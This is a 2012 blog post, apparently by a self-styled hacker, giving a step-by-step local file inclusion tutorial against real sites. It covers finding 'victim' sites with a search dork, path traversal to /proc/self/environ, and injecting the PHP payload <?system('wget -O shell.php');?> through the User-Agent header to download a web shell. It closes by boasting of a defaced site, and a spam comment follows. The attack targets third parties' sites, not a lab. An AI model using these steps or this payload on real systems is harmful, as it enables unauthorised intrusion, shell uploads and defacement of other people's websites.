Thursday, 20 December 2012

LFI Attack Tutorial

Hello im Eagle Eye
Today im gonna teach you LFI attack tutorial

Make sure you use firefox
Must have tamper data
And brain :D

::Follow this step::

First you must entering a dork


Not all site a vuln for this attack
After that choose any site that you want

After you get your victim url
we must find process work

ok for example

replace some things infront of page=
its will be like this
(url)index.php?page=( the things that we must put )

the things that we have to put is
with a lot of ../../../../../../../../proc/self/environ
then the url will be like this
so my victim url will be like
this my site ( u can try this site )

after that ...
the site will show like

its Mean Vulnerable :D

now open your tamper data to change the user agent from whatever it is to

open tamper data
then click start tamper data
after clicking start tamper data
you must reload your page
then some things will pop out
you click Tamper

copy this code ...

<?system('wget -O shell.php');?>

copy and paste at user agent
then click OK!

then stop tamper data!

u will able to see your shell at the end of url :)


my deface site --->

Special Thanks to Mohd Izzat because uploading shell while im make this tuto -_-


1 comment:

  1. This "Sequestration and children" article is for parents who are sure that they
    would get a Sequestration the day they are difficult to beat out.
    This is In the main caused by pessimistic feelings that regard the nonpartisanship of the life-sustaining records is
    existence provided to the general world through its
    Section of Vital Records, Department of Wellness & Genial

    Also visit my homepage Mariah Carey